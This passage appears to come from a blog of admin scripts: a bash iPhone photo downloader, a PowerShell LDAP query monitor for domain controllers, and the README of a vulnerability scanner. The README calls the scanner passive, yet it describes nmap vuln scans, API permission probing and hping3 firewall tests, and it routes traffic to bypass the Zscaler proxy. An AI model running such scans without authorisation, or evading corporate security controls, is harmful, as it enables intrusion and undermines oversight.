OUTPUT_DIR=$(cd "$OUTPUT_DIR" && pwd)
# Set up state directory for tracking downloads
STATE_DIR="$OUTPUT_DIR/.iphone_download_state"
mkdir -p "$STATE_DIR"
# Create mount point
mkdir -p "$MOUNT_POINT"
echo "=== iPhone Media Downloader ==="
echo "Pattern: $PATTERN"
echo "Output: $OUTPUT_DIR"
echo "Organize by date: $ORGANIZE_BY_DATE"
[ -n "$START_DATE" ] && echo "Start date: $START_DATE"
[ -n "$END_DATE" ] && echo "End date: $END_DATE"
echo ""
# Check if iPhone is connected
echo "Checking for iPhone connection..."
if ! ideviceinfo -s > /dev/null 2>&1; then
echo "Error: No iPhone detected. Please connect your iPhone and trust this computer."
exit 1
fi
# Mount iPhone
echo "Mounting iPhone..."
if ! ifuse "$MOUNT_POINT" 2>/dev/null; then
echo "Error: Failed to mount iPhone. Make sure you've trusted this computer on your iPhone."
exit 1
fi
# Cleanup function
cleanup() {
local exit_code=$?
echo ""
if [ $exit_code -ne 0 ]; then
echo "⚠ Download interrupted. Run the script again to resume."
fi
echo "Unmounting iPhone..."
umount "$MOUNT_POINT" 2>/dev/null || true
rmdir "$MOUNT_POINT" 2>/dev/null || true
}
trap cleanup EXIT
# Find DCIM folder
DCIM_PATH="$MOUNT_POINT/DCIM"
if [ ! -d "$DCIM_PATH" ]; then
echo "Error: DCIM folder not found on iPhone"
exit 1
fi
echo "Scanning for files matching pattern: $PATTERN"
echo ""
# Counter
TOTAL_FILES=0
COPIED_FILES=0
SKIPPED_FILES=0
RESUMED_FILES=0
FAILED_FILES=0
# Function to compute file checksum
compute_checksum() {
local file="$1"
if [ -f "$file" ]; then
shasum -a 256 "$file" 2>/dev/null | awk '{print $1}'
fi
}
# Function to get file size
get_file_size() {
local file="$1"
if [ -f "$file" ]; then
stat -f "%z" "$file" 2>/dev/null
fi
}
# Function to mark file as completed
mark_completed() {
local source_file="$1"
local dest_file="$2"
local checksum="$3"
local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
echo "$dest_file|$checksum|$(date +%s)" > "$state_file"
}
# Function to check if file was previously completed
is_completed() {
local source_file="$1"
local dest_file="$2"
local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
if [ ! -f "$state_file" ]; then
return 1
fi
# Read state file
local saved_dest saved_checksum saved_timestamp
IFS='|' read -r saved_dest saved_checksum saved_timestamp < "$state_file"
# Check if destination file exists and matches
if [ "$saved_dest" = "$dest_file" ] && [ -f "$dest_file" ]; then
if [ "$VERIFY_CHECKSUM" = true ]; then
local current_checksum=$(compute_checksum "$dest_file")
if [ "$current_checksum" = "$saved_checksum" ]; then
return 0
fi
else
# Without checksum verification, just check file exists
return 0
fi
fi
return 1
}
# Convert dates to timestamps for comparison
START_TIMESTAMP=""
END_TIMESTAMP=""
if [ -n "$START_DATE" ]; then
START_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$START_DATE" "+%s" 2>/dev/null || echo "")
if [ -z "$START_TIMESTAMP" ]; then
echo "Error: Invalid start date format. Use YYYY-MM-DD"
exit 1
fi
fi
if [ -n "$END_DATE" ]; then
END_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$END_DATE" "+%s" 2>/dev/null || echo "")
if [ -z "$END_TIMESTAMP" ]; then
echo "Error: Invalid end date format. Use YYYY-MM-DD"
exit 1
fi
# Add 24 hours to include the entire end date
END_TIMESTAMP=$((END_TIMESTAMP + 86400))
fi
# Process files
find "$DCIM_PATH" -type f | while read -r file; do
filename=$(basename "$file")
# Check if filename matches pattern (basic glob matching)
if [[ ! "$filename" == $PATTERN ]]; then
continue
fi
TOTAL_FILES=$((TOTAL_FILES + 1))
# Get file creation date
if command -v exiftool > /dev/null 2>&1; then
# Try to get date from EXIF data
CREATE_DATE=$(exiftool -s3 -DateTimeOriginal -d "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
if [ -z "$CREATE_DATE" ]; then
# Fallback to file modification time
CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
fi
else
# Use file modification time
CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
fi
# Extract date components
if [ -n "$CREATE_DATE" ]; then
FILE_DATE=$(echo "$CREATE_DATE" | cut -d' ' -f1)
FILE_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$FILE_DATE" "+%s" 2>/dev/null || echo "")
# Check date filters
if [ -n "$START_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -lt "$START_TIMESTAMP" ]; then
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
fi
if [ -n "$END_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -ge "$END_TIMESTAMP" ]; then
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
fi
# Determine output path with YYYY/MMM structure
if [ "$ORGANIZE_BY_DATE" = true ]; then
YEAR=$(echo "$FILE_DATE" | cut -d'-' -f1)
MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)
# Convert month number to 3-letter abbreviation
case "$MONTH_NUM" in
01) MONTH="Jan" ;;
02) MONTH="Feb" ;;
03) MONTH="Mar" ;;
04) MONTH="Apr" ;;
05) MONTH="May" ;;
06) MONTH="Jun" ;;
07) MONTH="Jul" ;;
08) MONTH="Aug" ;;
09) MONTH="Sep" ;;
10) MONTH="Oct" ;;
11) MONTH="Nov" ;;
12) MONTH="Dec" ;;
*) MONTH="Unknown" ;;
esac
DEST_DIR="$OUTPUT_DIR/$YEAR/$MONTH"
else
DEST_DIR="$OUTPUT_DIR"
fi
else
DEST_DIR="$OUTPUT_DIR"
fi
# Create destination directory
mkdir -p "$DEST_DIR"
# Determine destination path
DEST_PATH="$DEST_DIR/$filename"
# Check if this file was previously completed successfully
if is_completed "$file" "$DEST_PATH"; then
echo "✓ Already downloaded: $filename"
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
fi
# Check if file already exists with same content (for backward compatibility)
if [ -f "$DEST_PATH" ]; then
if cmp -s "$file" "$DEST_PATH"; then
echo "✓ Already exists (identical): $filename"
# Mark as completed for future runs
SOURCE_CHECKSUM=$(compute_checksum "$DEST_PATH")
mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
else
# Add timestamp to avoid overwriting different file
BASE="${filename%.*}"
EXT="${filename##*.}"
DEST_PATH="$DEST_DIR/${BASE}_$(date +%s).$EXT"
fi
fi
# Use temporary file for atomic copy
TEMP_PATH="${DEST_PATH}.tmp.$$"
# Copy to temporary file
echo "⬇ Downloading: $filename → $DEST_PATH"
if ! cp "$file" "$TEMP_PATH" 2>/dev/null; then
echo "✗ Failed to copy: $filename"
rm -f "$TEMP_PATH"
FAILED_FILES=$((FAILED_FILES + 1))
continue
fi
# Verify size matches (basic corruption check)
SOURCE_SIZE=$(get_file_size "$file")
TEMP_SIZE=$(get_file_size "$TEMP_PATH")
if [ "$SOURCE_SIZE" != "$TEMP_SIZE" ]; then
echo "✗ Size mismatch for $filename (source: $SOURCE_SIZE, copied: $TEMP_SIZE)"
rm -f "$TEMP_PATH"
FAILED_FILES=$((FAILED_FILES + 1))
continue
fi
# Compute checksum for verification and tracking
if [ "$VERIFY_CHECKSUM" = true ]; then
SOURCE_CHECKSUM=$(compute_checksum "$TEMP_PATH")
else
SOURCE_CHECKSUM="skipped"
fi
# Preserve timestamps
if [ -n "$CREATE_DATE" ]; then
touch -t $(date -j -f "%Y-%m-%d %H:%M:%S" "$CREATE_DATE" "+%Y%m%d%H%M.%S" 2>/dev/null) "$TEMP_PATH" 2>/dev/null || true
fi
# Atomic move from temp to final destination
if mv "$TEMP_PATH" "$DEST_PATH" 2>/dev/null; then
echo "✓ Completed: $filename"
# Mark as successfully completed
mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
COPIED_FILES=$((COPIED_FILES + 1))
else
echo "✗ Failed to finalize: $filename"
rm -f "$TEMP_PATH"
FAILED_FILES=$((FAILED_FILES + 1))
fi
done < <(find "$DCIM_PATH" -type f)
echo ""
echo "=== Summary ==="
echo "Total files matching pattern: $TOTAL_FILES"
echo "Files downloaded: $COPIED_FILES"
echo "Files already present: $SKIPPED_FILES"
if [ $FAILED_FILES -gt 0 ]; then
echo "Files failed: $FAILED_FILES"
echo ""
echo "⚠ Some files failed to download. Run the script again to retry."
exit 1
fi
echo ""
echo "✓ Download complete! All files transferred successfully."
OUTER_EOF
echo "Making the script executable..."
chmod +x download-iphone-media.sh
echo "✓ Script created successfully: download-iphone-media.sh"

Usage Examples

Basic Usage

Download all photos and videos to the current directory:

./download-iphone-media.sh

Download with Date Organization

Organize files into folders by creation date (YYYY/MMM structure):

./download-iphone-media.sh -d -o ./Pictures

This creates a structure like:

./Pictures
├── 2024/
│   ├── Jan/
│   │   ├── IMG_1234.jpg
│   │   └── IMG_1235.heic
│   ├── Feb/
│   └── Dec/
├── 2025/
│   ├── Jan/
│   └── Nov/

Filter by File Pattern

Download only specific file types:

# Only JPG files
./download-iphone-media.sh -p "*.jpg" -o ~/Pictures/iPhone
# Only videos (MOV and MP4)
./download-iphone-media.sh -p "*.mov" -o ~/Videos/iPhone
./download-iphone-media.sh -p "*.mp4" -o ~/Videos/iPhone
# Files starting with IMG_
./download-iphone-media.sh -p "IMG_*" -o ~/Pictures
# HEIC photos (iPhone's default format)
./download-iphone-media.sh -p "*.heic" -o ~/Pictures/iPhone

Filter by Date Range

Download photos from a specific date range:

# Photos from January 2025
./download-iphone-media.sh -s 2025-01-01 -e 2025-01-31 -d -o ~/Pictures/January2025
# Photos from last week
./download-iphone-media.sh -s 2025-11-10 -e 2025-11-17 -o ~/Pictures/LastWeek
# Photos after a specific date
./download-iphone-media.sh -s 2025-11-01 -o ~/Pictures/Recent

Combined Filters

Combine multiple options for precise control:

# Download only videos from January 2025, organized by date
./download-iphone-media.sh -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/Vacation
# Download all HEIC photos from the last month, organized by date
./download-iphone-media.sh -p "*.heic" -s 2025-10-17 -e 2025-11-17 -d -o ~/Pictures/LastMonth

Features

Resumable & Idempotent Downloads

  • Crash recovery: Interrupted downloads can be resumed by running the script again
  • Atomic operations: Files are copied to temporary locations first, then moved atomically
  • State tracking: Maintains a hidden state directory (.iphone_download_state) to track completed files
  • Checksum verification: Uses SHA-256 checksums to verify file integrity (can be disabled with -n for speed)
  • No duplicates: Running the script multiple times won’t re-download existing files
  • Corruption detection: Validates file sizes and optionally checksums after copy

Date-Based Organization

  • Automatic folder structure: Creates YYYY/MMM folders based on photo creation date (e.g., 2025/Jan, 2025/Feb)
  • EXIF data support: Reads actual photo capture date from EXIF metadata when available
  • Fallback mechanism: Uses file modification time if EXIF data is unavailable
  • Fewer folders: Maximum 12 month folders per year instead of up to 365 day folders

Smart File Handling

  • Duplicate detection: Skips files that already exist with identical content
  • Conflict resolution: Adds timestamp suffix to filename if different file with same name exists
  • Timestamp preservation: Maintains original creation dates on copied files
  • Error tracking: Reports failed files and provides clear exit codes

Progress Feedback

  • Real-time progress updates showing each file being downloaded
  • Summary statistics at the end (total found, downloaded, skipped, failed)
  • Clear error messages for troubleshooting
  • Helpful resume instructions if interrupted

Common File Patterns

iPhone typically uses these file formats:

Type           Extensions         Pattern Example
Photos         .jpg, .heic        *.jpg or *.heic
Videos         .mov, .mp4         *.mov or *.mp4
Screenshots    .png               *.png
Live Photos    .heic + .mov       IMG_*.heic + IMG_*.mov
All media      all of the above   * (default)

5. Handling Interrupted Downloads

If a download is interrupted (disconnection, error, etc.), simply run the script again:

# Script was interrupted - just run it again
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script will:

  • Skip all successfully downloaded files
  • Retry any failed files
  • Continue from where it left off

6. Fast Mode (Skip Checksum Verification)

For faster transfers on reliable connections, disable checksum verification:

# Skip checksums for speed (still verifies file sizes)
./download-iphone-media.sh -n -d -o ~/Pictures/iPhone

Note: This is generally safe but won’t detect corruption as thoroughly.

7. Clean State and Re-download

If you want to force a re-download of all files:

# Remove state directory to start fresh
rm -rf ~/Pictures/iPhone/.iphone_download_state
./download-iphone-media.sh -d -o ~/Pictures/iPhone

Troubleshooting

iPhone Not Detected

Error: No iPhone detected. Please connect your iPhone and trust this computer.

Solution:

  1. Make sure your iPhone is connected via USB cable
  2. Unlock your iPhone
  3. Tap “Trust” when prompted on your iPhone
  4. Run idevicepair pair if you haven’t already

Failed to Mount iPhone

Error: Failed to mount iPhone

Solution:

  1. Try unplugging and reconnecting your iPhone
  2. Check if another process is using the iPhone:
umount /tmp/iphone_mount 2>/dev/null
  3. Restart your iPhone and try again
  4. On macOS Ventura or later, check System Settings → Privacy & Security → Files and Folders

Permission Denied

Solution:
Make sure the script has executable permissions:

chmod +x download-iphone-media.sh

Missing Tools

Error: Commands not found

Solution:
Install the required tools:

brew tap gromgit/fuse
brew install libimobiledevice gromgit/fuse/ifuse-mac exiftool

On newer macOS versions, you may need to install macFUSE:

brew install --cask macfuse

After installation, you may need to restart your Mac and allow the kernel extension in System Settings → Privacy & Security.

Tips and Best Practices

1. Regular Backups

Create a scheduled backup script:

#!/bin/bash
# Save as ~/bin/backup-iphone-photos.sh
DATE=$(date +%Y-%m-%d)
BACKUP_DIR=~/Pictures/iPhone-Backups/$DATE
"$HOME/download-iphone-media.sh" -d -o "$BACKUP_DIR"
echo "Backup completed to $BACKUP_DIR"

2. Incremental Downloads

The script is fully idempotent and tracks completed downloads, making it perfect for incremental backups:

# Run daily to get new photos - only new files will be downloaded
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script maintains state in .iphone_download_state/ within your output directory, ensuring:

  • Already downloaded files are skipped instantly (no re-copying)
  • Interrupted downloads can be resumed
  • File integrity is verified with checksums

3. Free Up iPhone Storage

After confirming successful download:

  1. Verify files are on your MacBook
  2. Check file counts match
  3. Delete photos from iPhone via Photos app
  4. Empty “Recently Deleted” album
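To check that the counts roughly match (step 2 above), a quick way to count the media files on the Mac side is:

# Count downloaded photos and videos under the backup folder
find ~/Pictures/iPhone -type f \( -iname "*.heic" -o -iname "*.jpg" -o -iname "*.png" -o -iname "*.mov" -o -iname "*.mp4" \) | wc -l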

4. Convert HEIC to JPG (Optional)

If you need JPG files for compatibility:

# Install ImageMagick
brew install imagemagick
# Convert all HEIC files to JPG
find ~/Pictures/iPhone -name "*.heic" -exec sh -c 'magick "$0" "${0%.heic}.jpg"' {} \;

How Idempotent Recovery Works

The script implements several mechanisms to ensure safe, resumable downloads:

1. State Tracking

A hidden directory .iphone_download_state/ is created in your output directory. For each successfully downloaded file, a state file is created containing:

  • Destination file path
  • SHA-256 checksum (if verification enabled)
  • Completion timestamp
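Each state file is named after the SHA-256 hash of the source path on the iPhone and holds a single pipe-delimited line; the values below are purely illustrative:

# Inspect one state entry (hash in the filename truncated here for readability)
cat ~/Pictures/iPhone/.iphone_download_state/3f7a9c...
/Users/you/Pictures/iPhone/2025/Jan/IMG_0501.heic|9b1de0c4...|1737000000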

2. Atomic Operations

Each file is downloaded using a two-phase commit:

  1. Download Phase: Copy to temporary file (.tmp.$$ suffix)
  2. Verification Phase: Check file size and optionally compute checksum
  3. Commit Phase: Atomically move temp file to final destination
  4. Record Phase: Write completion state

If the script is interrupted at any point, incomplete temporary files are cleaned up automatically.

3. Idempotent Behavior

When you run the script:

  1. Before downloading each file, it checks the state directory
  2. If a state file exists, it verifies the destination file still exists and matches the checksum
  3. If verification passes, the file is skipped (no re-download)
  4. If verification fails or no state exists, the file is downloaded

This means:

  • ✓ Safe to run multiple times
  • ✓ Interrupted downloads can be resumed
  • ✓ Corrupted files are detected and re-downloaded
  • ✓ No wasted bandwidth on already-downloaded files

4. Checksum Verification

By default, SHA-256 checksums are computed and verified:

  • During download: Checksum computed after copy completes
  • On resume: Existing files are verified against stored checksum
  • Optional: Use -n flag to skip checksums for speed (still verifies file sizes)
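You can repeat the same check by hand: the checksum is the second pipe-delimited field of a state file, so compare it against a fresh shasum of the destination file (paths below are illustrative):

# Recompute the checksum of a downloaded file...
shasum -a 256 ~/Pictures/iPhone/2025/Jan/IMG_0501.heic
# ...and compare it with the value recorded in the corresponding state file
cut -d'|' -f2 ~/Pictures/iPhone/.iphone_download_state/<state-file-hash>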

Example Recovery Scenario

# Start downloading 1000 photos
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Script is interrupted after 500 files
# Press Ctrl+C or cable disconnects
# Simply run again - picks up where it left off
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Output:
# ✓ Already downloaded: IMG_0001.heic
# ✓ Already downloaded: IMG_0002.heic
# ...
# ⬇ Downloading: IMG_0501.heic → ~/Pictures/iPhone/2025/Jan/IMG_0501.heic

Performance Notes

  • Transfer speed: Depends on USB connection (USB 2.0 vs USB 3.0)
  • Large libraries: May take significant time for thousands of photos
  • EXIF reading: Adds minimal overhead but provides accurate dates
  • Pattern matching: Processed client-side, so all files are scanned

Conclusion

This script provides a robust, production-ready solution for downloading photos and videos from your iPhone to your MacBook. Key capabilities:

Core Features:

  • Filter by file patterns (type, name)
  • Filter by date ranges
  • Organize automatically into date-based folders
  • Preserve original file metadata

Reliability:

  • Fully idempotent – safe to run multiple times
  • Resumable downloads with automatic crash recovery
  • Atomic file operations prevent corruption
  • Checksum verification ensures data integrity
  • Clear error reporting and recovery instructions

For regular use, consider creating aliases in your ~/.zshrc:

# Add to ~/.zshrc
alias iphone-backup='~/download-iphone-media.sh -d -o ~/Pictures/iPhone'
alias iphone-videos='~/download-iphone-media.sh -p "*.mov" -d -o ~/Videos/iPhone'

Then simply run iphone-backup whenever you want to download your photos!


Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

Example:

.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath "C:\Logs\LDAP"

[CmdletBinding()]
param(
[int]$ThresholdSeconds = 5,
[string]$LogPath = "C:\LDAPDiagnostics",
[int]$MonitorDuration = 0  # 0 = continuous
)
# Requires Administrator privileges
#Requires -RunAsAdministrator
# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}
$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"
function Write-Log {
param([string]$Message, [string]$Level = "INFO")
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
$logMessage = "[$timestamp] [$Level] $Message"
Write-Host $logMessage
Add-Content -Path $logFile -Value $logMessage
}
function Get-LDAPStatistics {
try {
# Query NTDS performance counters for LDAP statistics
$ldapStats = @{
ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
}
return $ldapStats
}
catch {
Write-Log "Error getting LDAP statistics: $_" "ERROR"
return $null
}
}
function Parse-LDAPEvent {
param($Event)
$eventData = @{
TimeCreated = $Event.TimeCreated
ClientIP = $null
ClientPort = $null
StartingNode = $null
Filter = $null
SearchScope = $null
AttributeSelection = $null
ServerControls = $null
VisitedEntries = $null
ReturnedEntries = $null
TimeInServer = $null
}
# Parse event XML for detailed information
try {
$xml = [xml]$Event.ToXml()
$dataNodes = $xml.Event.EventData.Data
foreach ($node in $dataNodes) {
switch ($node.Name) {
"Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
"StartingNode" { $eventData.StartingNode = $node.'#text' }
"Filter" { $eventData.Filter = $node.'#text' }
"SearchScope" { $eventData.SearchScope = $node.'#text' }
"AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
"ServerControls" { $eventData.ServerControls = $node.'#text' }
"VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
"ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
"TimeInServer" { $eventData.TimeInServer = $node.'#text' }
}
}
}
catch {
Write-Log "Error parsing event XML: $_" "WARNING"
}
return $eventData
}
Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"
# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
$currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
if ($currentValue.'15 Field Engineering' -lt 5) {
Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
}
else {
Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
}
}
catch {
Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}
# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader
Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"
$startTime = Get-Date
$queriesLogged = 0
try {
while ($true) {
# Check if monitoring duration exceeded
if ($MonitorDuration -gt 0) {
$elapsed = (Get-Date) - $startTime
if ($elapsed.TotalMinutes -ge $MonitorDuration) {
Write-Log "Monitoring duration reached. Stopping." "INFO"
break
}
}
# Get current LDAP statistics
$stats = Get-LDAPStatistics
if ($stats) {
Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
}
# Query Directory Service event log for expensive LDAP queries
# Event ID 1644 = expensive search operations
$events = Get-WinEvent -FilterHashtable @{
LogName = 'Directory Service'
Id = 1644
StartTime = (Get-Date).AddSeconds(-10)
} -ErrorAction SilentlyContinue
foreach ($event in $events) {
$eventData = Parse-LDAPEvent -Event $event
# Convert time in server from milliseconds to seconds
$timeInSeconds = if ($eventData.TimeInServer) { 
[int]$eventData.TimeInServer / 1000 
} else { 
0 
}
if ($timeInSeconds -ge $ThresholdSeconds) {
$queriesLogged++
Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
Write-Log "Duration: $timeInSeconds seconds" "WARNING"
Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
Write-Log "Filter: $($eventData.Filter)" "WARNING"
Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
Write-Log "======================================" "WARNING"
# Write to CSV
$csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
Add-Content -Path $csvFile -Value $csvLine
}
}
Start-Sleep -Seconds 5
}
}
catch {
Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
Write-Log "Log file: $logFile" "INFO"
Write-Log "CSV file: $csvFile" "INFO"
}
Usage Examples

Basic Usage (Continuous Monitoring)

Run with default settings - monitors queries taking 5+ seconds:

.\Diagnose-LDAPQueries.ps1

Custom Threshold and Duration

Monitor for 30 minutes, logging queries that take 3+ seconds:

.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30

Custom Log Location

Save logs to a specific directory:

.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"

Verbose Output

See real-time LDAP statistics while monitoring:

.\Diagnose-LDAPQueries.ps1 -Verbose

Requirements

  • Administrator privileges on the domain controller
  • Windows Server with Active Directory Domain Services role
  • PowerShell 5.1 or later

Understanding the Output

Log File Example

[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000

What to Look For

  • High visited/returned ratio – Indicates an inefficient filter
  • Subtree searches from root – Often unnecessarily broad
  • Wildcard filters – Filters like (cn=*) can be very expensive
  • Unindexed attributes – Queries on non-indexed attributes visit many entries
  • Repeated queries – Same client making the same expensive query repeatedly

Troubleshooting Common Issues

No Events Appearing

If you're not seeing Event ID 1644, you may need to lower the expensive search threshold in Active Directory:

# Lower the threshold to 1000ms (1 second)
Get-ADObject "CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=yourdomain,DC=com" | 
Set-ADObject -Replace @{lDAPAdminLimits="MaxQueryDuration=1000"}

Script Requires Restart

After enabling Field Engineering logging, you may need to restart the NTDS service:

Restart-Service NTDS -Force

Best Practices

  1. Run during peak hours to capture real-world problematic queries
  2. Start with a lower threshold (2-3 seconds) to catch more queries
  3. Analyze the CSV in Excel or Power BI for patterns
  4. Correlate with client IPs to identify problematic applications
  5. Work with application owners to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

  1. Add indexes for frequently searched attributes
  2. Optimize LDAP filters to be more specific
  3. Reduce search scope where possible
  4. Implement paging for large result sets
  5. Cache results on the client side when appropriate

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!

MacBook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive passive penetration testing script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq
# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping
# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com
# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a
# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v
# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.
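If you are unsure which interface carries your default route on macOS, a quick check (standard macOS tooling assumed) is:

# Show the interface used for the default route
route -n get default | awk '/interface:/ {print $2}'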

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan Type              Duration
Basic                  2-5 min
With subdomains        +1-2 min/subdomain
With vulnerabilities   +10-20 min
Full scan              15-30 min

